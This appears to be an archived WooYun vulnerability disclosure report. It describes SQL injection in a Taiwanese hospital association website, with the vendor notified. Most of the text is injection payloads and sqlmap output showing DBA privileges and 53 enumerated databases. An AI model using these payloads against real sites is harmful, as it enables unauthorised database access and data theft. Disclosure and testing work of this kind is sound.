乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
台湾區域醫院協會SQL注入(dba权限+涉及53裤)玩命中啊,求个首页
http://**.**.**.**/site_item_content_2.php?site_map_item_id=310=============================测试' 返回不正常测试 and 1=1 返回正常测试 and 1=2 返回不正常很明显 布尔型注入========================================================
Place: GETParameter: site_map_item_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: site_map_item_id=310 AND 6121=6121 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: site_map_item_id=310 AND SLEEP(5)---[11:53:46] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOSweb application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0.11[11:53:46] [INFO] fetching current user[11:53:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[11:53:46] [INFO] retrieved: WebSiteOwner@localhostcurrent user: 'WebSiteOwner@localhost'
[11:56:23] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOSweb application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0.11[11:56:23] [INFO] testing if current user is DBA[11:56:23] [INFO] fetching current user[11:56:23] [INFO] resumed: WebSiteOwner@localhost[11:56:23] [WARNING] running in a single-thread mode. Please consideption '--threads' for faster data retrieval[11:56:23] [INFO] retrieved: 1current user is DBA: 'True'
涉及53裤
[11:56:58] [INFO] retrieved: 53[11:57:01] [INFO] retrieved: information_schema[11:57:52] [INFO] retrieved: 2014cl_db[11:58:16] [INFO] retrieved: almondcoffee_db[11:58:48] [INFO] retrieved: anderson_db[11:59:14] [INFO] retrieved: bandd_db[11:59:31] [INFO] retrieved: best2[11:59:43] [INFO] retrieved: bhc_db[11:59:57] [INFO] retrieved: bioscholars_db[12:00:29] [INFO] retrieved: bobo_db[12:00:51] [INFO] retrieved: carch_land_db[12:01:19] [INFO] retrieved: chuener_fong_db[12:02:02] [INFO] retrieved: ctbaa_db[12:02:20] [INFO] retrieved: ctbaa_party_db[12:02:48] [INFO] retrieved: cwin_db[12:03:17] [INFO] retrieved: cyia_db[12:03:31] [INFO] retrieved: db_Travel[12:03:51] [INFO] retrieved: db
肯定存在admin表的这个就不爆了 比较害怕 毕竟是中华民国
危害等级:高
漏洞Rank:18
确认时间:2015-12-24 18:43
感謝通報
暂无